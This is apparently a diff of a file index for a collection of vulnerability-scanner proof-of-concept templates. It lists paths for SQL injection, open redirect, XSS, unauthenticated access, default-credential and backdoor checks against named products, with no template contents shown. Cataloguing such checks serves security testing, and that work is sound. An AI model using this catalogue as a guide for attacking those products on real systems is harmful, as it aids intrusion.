./poc/microsoft/woosms-sms-module-for-woocommerce.yaml -./poc/microsoft/wp-arforms-listing-11415.yaml ./poc/microsoft/wp-arforms-listing-11416.yaml ./poc/microsoft/wp-arforms-listing-11417.yaml +./poc/microsoft/wp-arforms-listing-11418.yaml ./poc/microsoft/wp-arforms-listing.yaml ./poc/microsoft/wp-forms-puzzle-captcha-535ddb74e379b6bd8cd96534784a8e18.yaml ./poc/microsoft/wp-forms-puzzle-captcha-aff3112ad689326307e33432ad0c6e98.yaml @@ -50516,12 +50528,11 @@ ./poc/microsoft/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/microsoft/wp-gravity-forms-spreadsheets.yaml ./poc/microsoft/wp-mstore-plugin-listing-11501.yaml -./poc/microsoft/wp-mstore-plugin-listing.yaml ./poc/microsoft/wp-plugin-lifterlms-11533.yaml ./poc/microsoft/wp-plugin-lifterlms-11534.yaml ./poc/microsoft/wp-plugin-lifterlms-11535.yaml -./poc/microsoft/wp-plugin-lifterlms-11536.yaml ./poc/microsoft/wp-plugin-lifterlms.yaml +./poc/microsoft/wp-sfwd-lms-listing-11562.yaml ./poc/microsoft/wp-sfwd-lms-listing-11563.yaml ./poc/microsoft/wp-sfwd-lms-listing-11564.yaml ./poc/microsoft/wp-sfwd-lms-listing-11565.yaml @@ -50630,8 +50641,6 @@ ./poc/microsoft/wuzhicms-detect-11653.yaml ./poc/microsoft/wuzhicms-detect-11654.yaml ./poc/microsoft/wuzhicms-detect-11655.yaml -./poc/microsoft/wuzhicms-detect.yaml -./poc/microsoft/wuzhicms-sqli-11656.yaml ./poc/microsoft/wuzhicms-sqli-11657.yaml ./poc/microsoft/wuzhicms-sqli-11658.yaml ./poc/microsoft/wuzhicms-sqli-11659.yaml @@ -50643,11 +50652,9 @@ ./poc/microsoft/x-forms-express.yaml ./poc/microsoft/xdcms-sql.yaml ./poc/microsoft/xdcms-sql.yml -./poc/microsoft/xdcms-sqli-11664.yaml ./poc/microsoft/xdcms-sqli-11665.yaml ./poc/microsoft/xdcms-sqli-11666.yaml ./poc/microsoft/xdcms-sqli-11667.yaml -./poc/microsoft/xdcms-sqli.yaml ./poc/microsoft/xdcms-workflow.yaml ./poc/microsoft/xdcms.yaml ./poc/microsoft/xeams-admin-console.yaml @@ -50671,7 +50678,6 @@ ./poc/microsoft/yzmcms-detect.yaml ./poc/microsoft/yzmcms-installer.yaml ./poc/microsoft/yzmcms-panel.yaml -./poc/microsoft/zcms-v3-sqli-11773.yaml ./poc/microsoft/zcms-v3-sqli-11774.yaml ./poc/microsoft/zcms-v3-sqli-11775.yaml ./poc/microsoft/zcms-v3-sqli.yml @@ -50682,8 +50688,8 @@ ./poc/microsoft/zhixiangOA-msglog.aspx-sql.yaml ./poc/microsoft/zhuofansoft-cms.yaml ./poc/microsoft/zms-auth-bypass-11829.yaml -./poc/microsoft/zms-auth-bypass-11830.yaml ./poc/microsoft/zms-auth-bypass-11831.yaml +./poc/microsoft/zms-auth-bypass-11832.yaml ./poc/microsoft/zms-auth-bypass.yaml ./poc/microsoft/zoho-crm-forms-214f15a18793e7b424d313f7d9322ea1.yaml ./poc/microsoft/zoho-crm-forms-2b5679f874f417055036f384b6409e12.yaml @@ -50700,6 +50706,7 @@ ./poc/microsoft/zzzcms-workflow.yaml ./poc/microsoft/zzzcms-xss.yaml ./poc/microsoft/zzzcms.yaml +./poc/mongodb/alibaba-mongoshake-unauth-268.yaml ./poc/mongodb/alibaba-mongoshake-unauth-269.yaml ./poc/mongodb/alibaba-mongoshake-unauth-270.yaml ./poc/mongodb/dionaea-mongodb-honeypot-detection.yaml @@ -50708,7 +50715,6 @@ ./poc/mongodb/mongodb-detect-8920.yaml ./poc/mongodb/mongodb-detect-8921.yaml ./poc/mongodb/mongodb-detect.yaml -./poc/mongodb/mongodb-ops-manager-8922.yaml ./poc/mongodb/mongodb-ops-manager-8923.yaml ./poc/mongodb/mongodb-ops-manager-8924.yaml ./poc/mongodb/mongodb-ops-manager.yaml @@ -50716,7 +50722,6 @@ ./poc/mongodb/mongodb-unauth-8926.yaml ./poc/mongodb/mongodb-unauth-8927.yaml ./poc/mongodb/mongodb-unauth-8928.yaml -./poc/mongodb/mongodb-unauth.yaml ./poc/mongodb/mongodb.yaml ./poc/mongodb/mongoexpress.yaml ./poc/mongodb/robomongo-credential-1.yaml @@ -50730,11 +50735,9 @@ ./poc/mongodb/rockmongo-default-login-9898.yaml ./poc/mongodb/rockmongo-default-login-9899.yaml ./poc/mongodb/rockmongo-default-login-9900.yaml -./poc/mongodb/rockmongo-default-login.yaml ./poc/mongodb/rockmongo-default-password.yaml ./poc/mongodb/rockmongo-default-password.yml ./poc/mongodb/rockmongo-xss-9901.yaml -./poc/mongodb/rockmongo-xss-9902.yaml ./poc/mongodb/rockmongo-xss-9903.yaml ./poc/mongodb/rockmongo-xss-9904.yaml ./poc/mongodb/unauthenticated-mongo-express-1.yaml @@ -50742,6 +50745,7 @@ ./poc/mongodb/unauthenticated-mongo-express-10908.yaml ./poc/mongodb/unauthenticated-mongo-express-10909.yaml ./poc/mongodb/unauthenticated-mongo-express-10910.yaml +./poc/mongodb/unauthenticated-mongo-express-10911.yaml ./poc/mongodb/unauthenticated-mongo-express-2.yaml ./poc/mysql/EOffice_mysql_config_information_leak.yaml ./poc/mysql/ScanMySQLiErrorBased.yaml @@ -50751,7 +50755,6 @@ ./poc/mysql/exposed-mysql-initial-7322.yaml ./poc/mysql/exposed-mysql-initial-7323.yaml ./poc/mysql/exposed-mysql-initial-7324.yaml -./poc/mysql/exposed-mysql-initial.yaml ./poc/mysql/mysql-dump-files.yaml ./poc/mysql/mysql-my-cnf-disclosure.yaml ./poc/mysql/mysql-native-cred-bruteforce.yaml @@ -50766,12 +50769,13 @@ ./poc/mysql/seeyon-oa-a6-createmysql-infoleak.yaml ./poc/mysql/unrestricted-sg-ingress-mysql-port.yaml ./poc/netlify/api-netlify.yaml -./poc/netlify/netlify-cms-9039.yaml ./poc/netlify/netlify-cms-9040.yaml +./poc/netlify/netlify-cms-9041.yaml ./poc/netlify/netlify-cms.yaml ./poc/netlify/netlify-takeover-9042.yaml ./poc/netlify/netlify-takeover-9043.yaml ./poc/netlify/netlify-takeover.yaml +./poc/nginx/default-nginx-page-6880.yaml ./poc/nginx/default-nginx-page-6881.yaml ./poc/nginx/default-nginx-page-6882.yaml ./poc/nginx/default-nginx-page-6883.yaml @@ -50783,6 +50787,7 @@ ./poc/nginx/git-config-nginxoffbyslash-5.yaml ./poc/nginx/git-config-nginxoffbyslash-6.yaml ./poc/nginx/git-config-nginxoffbyslash-7.yaml +./poc/nginx/git-config-nginxoffbyslash-7628.yaml ./poc/nginx/git-config-nginxoffbyslash-7629.yaml ./poc/nginx/git-config-nginxoffbyslash-7630.yaml ./poc/nginx/git-config-nginxoffbyslash-7631.yaml @@ -50796,21 +50801,22 @@ ./poc/nginx/nginx-auto-installer.yaml ./poc/nginx/nginx-conf-exposed.yaml ./poc/nginx/nginx-config-9096.yaml -./poc/nginx/nginx-config-9098.yaml +./poc/nginx/nginx-config-9097.yaml ./poc/nginx/nginx-config-9099.yaml ./poc/nginx/nginx-config-exposure.yaml -./poc/nginx/nginx-config.yaml ./poc/nginx/nginx-linux-page-9100.yaml ./poc/nginx/nginx-linux-page-9101.yaml +./poc/nginx/nginx-linux-page-9102.yaml ./poc/nginx/nginx-linux-page-9103.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-1.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-2.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-3.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-9104.yaml -./poc/nginx/nginx-merge-slashes-path-traversal.yaml +./poc/nginx/nginx-merge-slashes-path-traversal-9105.yaml ./poc/nginx/nginx-module-vts-xss-9106.yaml ./poc/nginx/nginx-module-vts-xss-9107.yaml ./poc/nginx/nginx-module-vts-xss-9108.yaml +./poc/nginx/nginx-module-vts-xss-9109.yaml ./poc/nginx/nginx-module-vts-xss-9110.yaml ./poc/nginx/nginx-module-vts-xss.yaml ./poc/nginx/nginx-proxy-manager-9112.yaml @@ -50845,7 +50851,6 @@ ./poc/nodejs/aliexpress-phish.yaml ./poc/nodejs/american-express-phish.yaml ./poc/nodejs/api-npm-471.yaml -./poc/nodejs/api-npm.yaml ./poc/nodejs/chilexpress-oficial-0932261639768e36f912c56f3f9fb502.yaml ./poc/nodejs/chilexpress-oficial.yaml ./poc/nodejs/cisco-expressway-panel.yaml @@ -50862,6 +50867,7 @@ ./poc/nodejs/drupal_module-node_view_permissions-access-bypass.yaml ./poc/nodejs/drupal_module-quick_node_clone-access-bypass.yaml ./poc/nodejs/erlang-node.yaml +./poc/nodejs/express-lfr (copy 1).yaml ./poc/nodejs/express-lfr-json.yaml ./poc/nodejs/express-shop-03a76e2497e7380342a3ee5d75d5a841.yaml ./poc/nodejs/express-shop-0ea495b50daeb59a898a0ab0f191ec21.yaml @@ -50876,11 +50882,13 @@ ./poc/nodejs/expresslfr_post.yaml ./poc/nodejs/geonode.yaml ./poc/nodejs/gradle-cache-node-detect-7797.yaml +./poc/nodejs/gradle-cache-node-detect-7798.yaml ./poc/nodejs/gradle-cache-node-detect.yaml ./poc/nodejs/grandnode.yaml ./poc/nodejs/ibm-web-traffic-express-caching-proxy.yaml ./poc/nodejs/kube-api-nodes-8507.yaml ./poc/nodejs/kube-api-nodes-8508.yaml +./poc/nodejs/lfr_express.yaml ./poc/nodejs/mailsite-express.yaml ./poc/nodejs/mailsiteexpress.yaml ./poc/nodejs/mongo-express-cve-2019-10758.yml @@ -50911,12 +50919,12 @@ ./poc/nodejs/node-env.yaml ./poc/nodejs/node-exporter-metrics-9135.yaml ./poc/nodejs/node-express-status.yaml -./poc/nodejs/node-integration-enabled-9136.yaml +./poc/nodejs/node-integration-enabled-9137.yaml ./poc/nodejs/node-integration-enabled.yaml ./poc/nodejs/node-nunjucks-ssti.yaml ./poc/nodejs/node-red-dashboard-file-read-cve-2021-3223.yml ./poc/nodejs/node-red-detect-9138.yaml -./poc/nodejs/node-red-detect.yaml +./poc/nodejs/node-red-detect-9139.yaml ./poc/nodejs/node-red-ui-base-anyfile-read.yaml ./poc/nodejs/node-red-workflow.yaml ./poc/nodejs/nodebb-installer.yaml @@ -50940,8 +50948,9 @@ ./poc/nodejs/unauthenticated-mongo-express-10908.yaml ./poc/nodejs/unauthenticated-mongo-express-10909.yaml ./poc/nodejs/unauthenticated-mongo-express-10910.yaml +./poc/nodejs/unauthenticated-mongo-express-10911.yaml ./poc/nodejs/unauthenticated-mongo-express-2.yaml -./poc/nodejs/unauthorized-puppet-node-manager-detect-10958.yaml +./poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml ./poc/nodejs/unauthorized-puppet-node-manager-detect.yaml ./poc/nodejs/webp-express-1fbe9279dc139e40de171678cc908922.yaml ./poc/nodejs/webp-express-802342a8791d6bf81a3a97aaebbba8bf.yaml @@ -50995,11 +51004,9 @@ ./poc/open_redirect/all-in-one-redirection.yaml ./poc/open_redirect/aspnuke-openredirect-554.yaml ./poc/open_redirect/aspnuke-openredirect-555.yaml -./poc/open_redirect/aspnuke-openredirect-556.yaml -./poc/open_redirect/aspnuke-openredirect.yaml -./poc/open_redirect/attitude-theme-open-redirect-586.yaml +./poc/open_redirect/aspnuke-openredirect-557.yaml ./poc/open_redirect/attitude-theme-open-redirect-587.yaml -./poc/open_redirect/attitude-theme-open-redirect.yaml +./poc/open_redirect/attitude-theme-open-redirect-588.yaml ./poc/open_redirect/attitude-wp-theme-open-redirect.yaml ./poc/open_redirect/aws-redirect-651.yaml ./poc/open_redirect/aws-redirect-652.yaml @@ -51014,7 +51021,7 @@ ./poc/open_redirect/bitrix-open-redirect-5.yaml ./poc/open_redirect/bitrix-open-redirect-6.yaml ./poc/open_redirect/bitrix-open-redirect-7.yaml -./poc/open_redirect/bitrix-open-redirect-743.yaml +./poc/open_redirect/bitrix-open-redirect-744.yaml ./poc/open_redirect/bitrix-open-redirect-745.yaml ./poc/open_redirect/bitrix-open-redirect-8.yaml ./poc/open_redirect/bitrix-open-redirect-9.yaml @@ -51023,7 +51030,7 @@ ./poc/open_redirect/brandfolder-open-redirect-780.yaml ./poc/open_redirect/brandfolder-open-redirect-781.yaml ./poc/open_redirect/caddy-open-redirect-835.yaml -./poc/open_redirect/caddy-open-redirect-837.yaml +./poc/open_redirect/caddy-open-redirect-836.yaml ./poc/open_redirect/caddy-open-redirect.yaml ./poc/open_redirect/cf7-redirect-thank-you-page-ea1e6381dbae7882ca5c498271c956f8.yaml ./poc/open_redirect/cf7-redirect-thank-you-page.yaml @@ -51043,7 +51050,7 @@ ./poc/open_redirect/drupal-user-enum-redirect-4.yaml ./poc/open_redirect/drupal-user-enum-redirect-7112.yaml ./poc/open_redirect/drupal-user-enum-redirect-7113.yaml -./poc/open_redirect/drupal-user-enum-redirect-7114.yaml +./poc/open_redirect/drupal-user-enum-redirect-7115.yaml ./poc/open_redirect/drupal_module-anonymousredirect-unsupported.yaml ./poc/open_redirect/drupal_module-elf-open-redirect-vulnerability.yaml ./poc/open_redirect/drupal_module-pubdlcnt-open-redirect-vulnerability.yaml @@ -51078,16 +51085,15 @@ ./poc/open_redirect/get-redirects.yaml ./poc/open_redirect/grimag-open-redirect.yaml ./poc/open_redirect/headless-open-redirect.yaml -./poc/open_redirect/homeautomation-v3-openredirect-7982.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7983.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7984.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7985.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7986.yaml ./poc/open_redirect/htaccess-redirect-15d8c137823c3b6979566e3d6ce26232.yaml ./poc/open_redirect/htaccess-redirect.yaml +./poc/open_redirect/httpbin-open-redirect-8047.yaml ./poc/open_redirect/httpbin-open-redirect-8048.yaml ./poc/open_redirect/httpbin-open-redirect-8049.yaml -./poc/open_redirect/httpbin-open-redirect.yaml ./poc/open_redirect/httpbin-open-redirect.yml ./poc/open_redirect/https-to-http-redirect.yaml ./poc/open_redirect/icewarp-open-redirect.yaml @@ -51111,6 +51117,7 @@ ./poc/open_redirect/music-store-open-redirect-8972.yaml ./poc/open_redirect/netsweeper-open-redirect-9063.yaml ./poc/open_redirect/netsweeper-open-redirect-9064.yaml +./poc/open_redirect/netsweeper-open-redirect.yaml ./poc/open_redirect/newsletter-manager-open-redirect-9075.yaml ./poc/open_redirect/newsletter-manager-open-redirect.yaml ./poc/open_redirect/newsletter-open-redirect-9076.yaml @@ -51118,7 +51125,6 @@ ./poc/open_redirect/newsletter-open-redirect-9078.yaml ./poc/open_redirect/newsletter-open-redirect.yaml ./poc/open_redirect/nextjs-redirect.yaml -./poc/open_redirect/ninjaform-open-redirect-9133.yaml ./poc/open_redirect/ninjaform-open-redirect-9134.yaml ./poc/open_redirect/ninjaform-open-redirect.yaml ./poc/open_redirect/noptin-open-redirect.yaml @@ -51127,12 +51133,10 @@ ./poc/open_redirect/odoo-cms-redirect-9199.yaml ./poc/open_redirect/odoo-cms-redirect-9200.yaml ./poc/open_redirect/odoo-cms-redirect-9201.yaml -./poc/open_redirect/odoo-cms-redirect.yaml ./poc/open_redirect/odoo-openredirect.yaml ./poc/open_redirect/office365-open-redirect-9212.yaml ./poc/open_redirect/office365-open-redirect-9213.yaml ./poc/open_redirect/office365-open-redirect-9214.yaml -./poc/open_redirect/office365-open-redirect-9215.yaml ./poc/open_redirect/ojs-unauthenticated-open-redirect.yaml ./poc/open_redirect/open-redirect-00.yaml ./poc/open_redirect/open-redirect-01.yaml @@ -51165,7 +51169,6 @@ ./poc/open_redirect/open-redirect-9305.yaml ./poc/open_redirect/open-redirect-9306.yaml ./poc/open_redirect/open-redirect-9307.yaml -./poc/open_redirect/open-redirect-9308.yaml ./poc/open_redirect/open-redirect-9309.yaml ./poc/open_redirect/open-redirect-9310.yaml ./poc/open_redirect/open-redirect-9311.yaml @@ -51187,11 +51190,10 @@ ./poc/open_redirect/peters-login-redirect.yaml ./poc/open_redirect/pieregister-open-redirect-9577.yaml ./poc/open_redirect/pieregister-open-redirect-9578.yaml -./poc/open_redirect/pieregister-open-redirect.yaml -./poc/open_redirect/pieregister-plugin-open-redirect.yaml +./poc/open_redirect/pieregister-open-redirect-9579.yaml ./poc/open_redirect/pollbot-redirect-9621.yaml +./poc/open_redirect/pollbot-redirect-9622.yaml ./poc/open_redirect/pollbot-redirect-9623.yaml -./poc/open_redirect/pollbot-redirect.yaml ./poc/open_redirect/postcode-redirect-6477bf18cad6c823db485408d49b337b.yaml ./poc/open_redirect/postcode-redirect-8fce0528958fb8f6fccd77f326340662.yaml ./poc/open_redirect/postcode-redirect.yaml @@ -51333,7 +51335,6 @@ ./poc/open_redirect/redirects.yaml ./poc/open_redirect/safe-redirect-manager-93b4dd80cb08c6bb491877eefaa735d9.yaml ./poc/open_redirect/safe-redirect-manager.yaml -./poc/open_redirect/sap-redirect-10064.yaml ./poc/open_redirect/sap-redirect-10065.yaml ./poc/open_redirect/sap-redirect-10066.yaml ./poc/open_redirect/sap-redirect-10067.yaml @@ -51380,15 +51381,14 @@ ./poc/open_redirect/ssl-atlas-free-ssl-certificate-https-redirect-24a5e6e71d2e98ce73b85cf4a837e007.yaml ./poc/open_redirect/ssl-atlas-free-ssl-certificate-https-redirect-6477bf18cad6c823db485408d49b337b.yaml ./poc/open_redirect/ssl-atlas-free-ssl-certificate-https-redirect.yaml -./poc/open_redirect/thinkific-redirect-10732.yaml ./poc/open_redirect/thinkific-redirect-10733.yaml ./poc/open_redirect/thinkific-redirect-10734.yaml ./poc/open_redirect/thinkific-redirect-10735.yaml ./poc/open_redirect/thinkific-redirect-10736.yaml ./poc/open_redirect/thinkific-redirect-10737.yaml +./poc/open_redirect/thinkific-redirect.yaml ./poc/open_redirect/tpg-redirect-85f56196634b8bf7c02f780064a6fc7d.yaml ./poc/open_redirect/tpg-redirect.yaml -./poc/open_redirect/ultimatemember-open-redirect-10877.yaml ./poc/open_redirect/ultimatemember-open-redirect-10878.yaml ./poc/open_redirect/ultimatemember-open-redirect-10879.yaml ./poc/open_redirect/ultimatemember-plugin-open-redirect.yaml @@ -51397,19 +51397,16 @@ ./poc/open_redirect/wc-thanks-redirect-8ce62c9a29dcc031d4f086c2f6793117.yaml ./poc/open_redirect/wc-thanks-redirect.yaml ./poc/open_redirect/webp-coverter-open-redirect.yaml -./poc/open_redirect/weekender-newspaper-open-redirect-11186.yaml ./poc/open_redirect/weekender-newspaper-open-redirect-11187.yaml ./poc/open_redirect/weekender-newspaper-open-redirect-11188.yaml -./poc/open_redirect/weekender-newspaper-open-redirect.yaml ./poc/open_redirect/weekender-newspaper-wp-theme-open-redirect.yaml ./poc/open_redirect/woo-login-redirect-317022364d5cdae673f22cdada5aba50.yaml ./poc/open_redirect/woo-login-redirect-e4654f9a46c58ec7da5e9256a56d6e89.yaml ./poc/open_redirect/woo-login-redirect.yaml ./poc/open_redirect/woocommerce-add-to-cart-custom-redirect-64a9b17becafc7bb8d1d5b45684524cd.yaml ./poc/open_redirect/woocommerce-add-to-cart-custom-redirect.yaml -./poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml ./poc/open_redirect/wordpress-redirection-plugin-listing-11307.yaml -./poc/open_redirect/wordpress-redirection-plugin-listing.yaml +./poc/open_redirect/wordpress-redirection-plugin-listing-11308.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-062dffbc9ba36d2c45b3c3ca1f34e0d3.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-76a6410aed89ec5d80b58eb825a4989b.yaml ./poc/open_redirect/wp-404-auto-redirect-to-similar-post-c3c279f6a773c00d7aae3e43cf34cb82.yaml @@ -51422,8 +51419,10 @@ ./poc/open_redirect/wp-grimag-open-redirect-11459.yaml ./poc/open_redirect/wp-grimag-open-redirect-11460.yaml ./poc/open_redirect/wp-grimag-open-redirect-11461.yaml +./poc/open_redirect/wp-grimag-open-redirect-11462.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11463.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11464.yaml +./poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11466.yaml ./poc/open_redirect/wp-login-and-logout-redirect-bcc9e091fa98d610ac79a7162207c92e.yaml ./poc/open_redirect/wp-login-and-logout-redirect.yaml @@ -51451,6 +51450,7 @@ ./poc/open_redirect/wptouch-open-redirect-11592.yaml ./poc/open_redirect/wptouch-open-redirect-11593.yaml ./poc/open_redirect/wptouch-open-redirect-11594.yaml +./poc/open_redirect/wptouch-open-redirect-11595.yaml ./poc/open_redirect/wptouch-plugin-open-redirect.yaml ./poc/open_redirect/zip-codes-redirect-6477bf18cad6c823db485408d49b337b.yaml ./poc/open_redirect/zip-codes-redirect-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -51469,9 +51469,9 @@ ./poc/oracle/default-oracle-application-page-6891.yaml ./poc/oracle/default-oracle-application-page-6892.yaml ./poc/oracle/default-oracle-application-page-6893.yaml -./poc/oracle/default-oracle-application-page.yaml ./poc/oracle/dms-oracle.yaml ./poc/oracle/metadata-oracle-8829.yaml +./poc/oracle/metadata-oracle-8830.yaml ./poc/oracle/metadata-oracle-8831.yaml ./poc/oracle/oracle-access-manager.yaml ./poc/oracle/oracle-adf-faces.yaml @@ -51479,6 +51479,7 @@ ./poc/oracle/oracle-bi-default-credentials.yaml ./poc/oracle/oracle-business-control-9344.yaml ./poc/oracle/oracle-business-control-9345.yaml +./poc/oracle/oracle-business-control-9346.yaml ./poc/oracle/oracle-business-control-9347.yaml ./poc/oracle/oracle-business-control-9348.yaml ./poc/oracle/oracle-business-control.yaml @@ -51488,6 +51489,7 @@ ./poc/oracle/oracle-containers-panel.yaml ./poc/oracle/oracle-dbass-detect-9349.yaml ./poc/oracle/oracle-dbass-detect-9350.yaml +./poc/oracle/oracle-dbass-detect-9351.yaml ./poc/oracle/oracle-dbcs-9352.yaml ./poc/oracle/oracle-dbcs-9353.yaml ./poc/oracle/oracle-dbcs-9354.yaml @@ -51497,12 +51499,11 @@ ./poc/oracle/oracle-ebs-bispgraph-file-access-9356.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9357.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9358.yaml -./poc/oracle/oracle-ebs-bispgraph-file-access-9359.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9360.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9361.yaml ./poc/oracle/oracle-ebs-config-disclosure.yaml ./poc/oracle/oracle-ebs-credentials-9364.yaml -./poc/oracle/oracle-ebs-credentials-9365.yaml +./poc/oracle/oracle-ebs-credentials-9366.yaml ./poc/oracle/oracle-ebs-credentials-disclosure-9363.yaml ./poc/oracle/oracle-ebs-credentials-disclosure.yaml ./poc/oracle/oracle-ebs-credentials.yaml @@ -51511,7 +51512,6 @@ ./poc/oracle/oracle-ebs-sqllog-disclosure-9367.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9370.yaml -./poc/oracle/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9372.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure.yaml ./poc/oracle/oracle-ebs-xss-1.yaml @@ -51535,7 +51535,6 @@ ./poc/oracle/oracle-http-server-12c-9384.yaml ./poc/oracle/oracle-http-server-12c.yaml ./poc/oracle/oracle-httpserver12c.yaml -./poc/oracle/oracle-integrated-manager-9386.yaml ./poc/oracle/oracle-integrated-manager-9387.yaml ./poc/oracle/oracle-integrated-manager-9388.yaml ./poc/oracle/oracle-integrated-manager-9389.yaml @@ -51543,7 +51542,8 @@ ./poc/oracle/oracle-integrated-manager.yaml ./poc/oracle/oracle-iplanet-web-server-9391.yaml ./poc/oracle/oracle-iplanet-web-server-9392.yaml -./poc/oracle/oracle-oam-xss.yaml +./poc/oracle/oracle-iplanet-web-server-9393.yaml +./poc/oracle/oracle-iplanet-web-server.yaml ./poc/oracle/oracle-opera.yaml ./poc/oracle/oracle-people-enterprise-9394.yaml ./poc/oracle/oracle-people-enterprise-9395.yaml @@ -51559,6 +51559,7 @@ ./poc/oracle/oracle-siebel-xss-9401.yaml ./poc/oracle/oracle-siebel-xss-9402.yaml ./poc/oracle/oracle-siebel-xss-9403.yaml +./poc/oracle/oracle-siebel-xss.yaml ./poc/oracle/oracle-stat.yaml ./poc/oracle/oracle-tns-listner.yaml ./poc/oracle/oracle-tns.yaml @@ -51704,8 +51705,8 @@ ./poc/other/3dprint.yaml ./poc/other/3g-wireless-gateway-3.yaml ./poc/other/3g-wireless-gateway-4.yaml -./poc/other/3g-wireless-gateway-5.yaml ./poc/other/3g-wireless-gateway-6.yaml +./poc/other/3g-wireless-gateway.yaml ./poc/other/3gmeeting-fileRead.yaml ./poc/other/3r-elementor-timeline-widget.yaml ./poc/other/40 - T5.yaml @@ -51894,6 +51895,7 @@ ./poc/other/LPDString.yaml ./poc/other/LSCP.yaml ./poc/other/LayerSlider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/LayerSlider-plugin.yaml ./poc/other/LibreOfficeImpressSCPair.yaml ./poc/other/LiveBOS_ShowImage_FileRead.yaml ./poc/other/Lm-FileRead.yaml @@ -51993,6 +51995,7 @@ ./poc/other/VerifierAdvanced.yaml ./poc/other/VersionRequest.yaml ./poc/other/WOOYUN-2010-080723.yaml +./poc/other/WSO2-2019-0598.yaml ./poc/other/WSO2MgmtConsole.yaml ./poc/other/Weaver-SignatureDownload-file-read.yaml ./poc/other/Wireless-leakage.yaml @@ -52003,9 +52006,7 @@ ./poc/other/X-Client-IP.yaml ./poc/other/X-Host.yaml ./poc/other/X-Remote-Addr .yaml -./poc/other/X-Remote-Addr.yaml ./poc/other/X-Remote-IP .yaml -./poc/other/X-Remote-IP.yaml ./poc/other/X-Rewrite-URL.yaml ./poc/other/X11Probe.yaml ./poc/other/Yes-059f1c0288ee3dfe1136ff4836457838.yaml @@ -52338,7 +52339,7 @@ ./poc/other/acme-fix-images.yaml ./poc/other/acobot-1fb586cbe3dd033c68d0357915d33bdc.yaml ./poc/other/acobot.yaml -./poc/other/acrolinx-dashboard-37.yaml +./poc/other/acrolinx-dashboard-36.yaml ./poc/other/acrolinx-dashboard-38.yaml ./poc/other/acrolinx-dashboard.yaml ./poc/other/acrolinx-workflow.yaml @@ -52400,6 +52401,7 @@ ./poc/other/acunetix-panel-54.yaml ./poc/other/acunetix-panel-55.yaml ./poc/other/acunetix-panel-57.yaml +./poc/other/acunetix-panel-58.yaml ./poc/other/acunetix-panel-59.yaml ./poc/other/acunetix-wvs.yaml ./poc/other/acymailing-882e0d234614e9072c071f9d28362d8a.yaml @@ -52648,7 +52650,7 @@ ./poc/other/adifier-system.yaml ./poc/other/adifier.yaml ./poc/other/adimoney.yaml -./poc/other/adiscon-loganalyzer-68.yaml +./poc/other/adiscon-loganalyzer-67.yaml ./poc/other/adiscon-loganalyzer-69.yaml ./poc/other/adiscon-loganalyzer-70.yaml ./poc/other/adiscon-loganalyzer.yaml @@ -52732,7 +52734,7 @@ ./poc/other/adminer-panel-7.yaml ./poc/other/adminer-panel-74.yaml ./poc/other/adminer-panel-75.yaml -./poc/other/adminer-panel-76.yaml +./poc/other/adminer-panel-77.yaml ./poc/other/adminer-panel.yaml ./poc/other/adminer-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/adminer-plugin.yaml @@ -52763,7 +52765,7 @@ ./poc/other/adminpad-024c994284cb4846e1f6626814560a64.yaml ./poc/other/adminpad.yaml ./poc/other/adminset-panel-78.yaml -./poc/other/adminset-panel-80.yaml +./poc/other/adminset-panel-79.yaml ./poc/other/adminset-panel.yaml ./poc/other/adplugg-058141c25a1a879f99185b818d355e02.yaml ./poc/other/adplugg-4cde8c10175a7219c94dab4ded72ef4e.yaml @@ -53213,10 +53215,8 @@ ./poc/other/ajp.yaml ./poc/other/akal-f079b6e59ea0bbabb419d26f8287c189.yaml ./poc/other/akal.yaml -./poc/other/akamai-cloudtest-250.yaml ./poc/other/akamai-cloudtest-251.yaml ./poc/other/akamai-cloudtest-252.yaml -./poc/other/akamai-cloudtest-253.yaml ./poc/other/akamai-cloudtest-254.yaml ./poc/other/akamai-cloudtest.yaml ./poc/other/akeeba-installer.yaml @@ -53275,9 +53275,10 @@ ./poc/other/alibaba-nacos.yaml ./poc/other/alibaba-企业邮箱.yaml ./poc/other/alibaba_canal.yaml -./poc/other/alienvault-usm-272.yaml +./poc/other/alienvault-usm-271.yaml ./poc/other/alienvault-usm-273.yaml ./poc/other/alienvault-usm-274.yaml +./poc/other/alienvault-usm.yaml ./poc/other/alipay-97da3f4d222cef9fb78a6d344c4a78ab.yaml ./poc/other/alipay.yaml ./poc/other/aliyun-rds.yaml @@ -53536,7 +53537,7 @@ ./poc/other/amplus.yaml ./poc/other/ampps-admin-panel-304.yaml ./poc/other/ampps-admin-panel-305.yaml -./poc/other/ampps-admin-panel-306.yaml +./poc/other/ampps-dirlisting-307.yaml ./poc/other/ampps-dirlisting-308.yaml ./poc/other/ampps-panel-309.yaml ./poc/other/ampps-panel-310.yaml @@ -53687,7 +53688,6 @@ ./poc/other/antreas.yaml ./poc/other/antsword-backdoor-333.yaml ./poc/other/antsword-backdoor-334.yaml -./poc/other/antsword-backdoor-335.yaml ./poc/other/anual-archive-233a1eb6f6f8782c599ef9a31673793f.yaml 